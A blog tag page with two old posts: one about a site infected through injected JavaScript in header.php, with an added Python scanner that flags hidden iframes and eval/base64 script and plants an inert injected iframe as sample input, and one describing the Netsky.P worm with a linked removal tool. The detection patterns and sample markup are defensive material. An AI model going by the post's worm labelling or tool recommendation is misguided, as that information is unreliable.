Posts Tagged ‘virus’

Trouble with js/downloader.agent

Posted By Harsh Singh on March 10th, 2010

http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/

I don’t know how it happened, but for the last few days, whenever I opened my site, my AVG would pop up a warning about some malicious JavaScript. I never paid much attention to this; after all, they even detect harmless keygens as trojans too :P. So I never took this seriously, hoping that everything would be fine in a few days (height of optimism).

But AVG kept on threatening me, and when my readers complained about this too, I got a little worried. I knew there was a JavaScript, and I knew it was something related to a downloader agent. I knew where to start from. I googled it straight away (Bless Google. Without you, we would be helpless). But Mr. Google failed, as the only information I could gather was that it was some phishing attack (XSS, iframe), but I didn’t know how to fix this problem.

Starting from scratch, I checked all my files for something “malicious”. And guess what I got. This bit of code was hiding in header.php.

No idea where this thing came from. Lesson learnt: always take your antivirus seriously, and an XSS / iframe attack even more seriously.
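A sketch of the file check described in this post, added here as an example and not taken from the original post. The post does not show the code that was found, so the patterns below are heuristic assumptions about common injected markup (hidden iframes, decoded-and-written script), and the theme files and `example.invalid` URL are constructed sample input.

```python
import re
import tempfile
from pathlib import Path

# Heuristic rules (assumptions, not the code from the post): markup that
# legitimate theme templates rarely contain.
PATTERNS = {
    "hidden-iframe": re.compile(
        r"<iframe\b[^>]*(?:(?:width|height)\s*=\s*[\"']?[01]\b"
        r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I),
    "unescape-write": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "eval-decode": re.compile(
        r"eval\s*\(\s*(?:unescape|String\.fromCharCode|atob)\s*\(", re.I),
    "php-eval-base64": re.compile(
        r"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.I),
}
EXTENSIONS = {".php", ".js", ".html", ".htm"}

# Constructed sample header.php with two inert injected lines (lines 3 and 4).
SAMPLE_HEADER = """<?php /* theme header */ ?>
<html><head><title><?php bloginfo('name'); ?></title>
<iframe src="http://example.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cp%3Eplaceholder%3C%2Fp%3E'));</script>
</head>
"""

def scan_text(text):
    """Return (line_number, rule_name) for every rule hit in the text."""
    return [(n, rule)
            for n, line in enumerate(text.splitlines(), 1)
            for rule, rx in PATTERNS.items() if rx.search(line)]

def scan_tree(root):
    """Scan web files under root; map relative path -> list of hits."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Build a constructed two-file theme in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        theme = Path(d) / "theme"
        theme.mkdir()
        (theme / "header.php").write_text(SAMPLE_HEADER)
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n</body></html>\n")
        return scan_tree(d)

if __name__ == "__main__":
    print(demo())
```

A hit is a lead for manual review, not a verdict; comparing the flagged file against a clean copy of the theme shows what was added.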

Virus :: A folder is automatically created within all the folders with the same name as parent folder

Posted By Harsh Singh on March 7th, 2009


One of the most common viruses to affect your system. This virus automatically creates a folder within each folder with the same name as the parent folder. It appears again and again even if you delete it a thousand times.

More info about this virus

Name of the threat: W32.Netsky.P@mm
Command or file name: FVProtect.exe

Threat type: Spywaretrojan

Affected OS:
Win32 (Windows 9x, Windows XP, Windows Vista)

Intrusion Method

This threat copies its file(s) to your hard disk. Its typical file name is W32.Netsky.P@mm. Then it creates a new startup key with the name W32.Netsky.P@mm and the value FVProtect.exe. You can also find it in your process list under the name FVProtect.exe or W32.Netsky.P@mm.

Solution

Download program for FVProtect.exe removal (True Sword Threat Remover)

Courtesy : http://www.securitystronghold.com/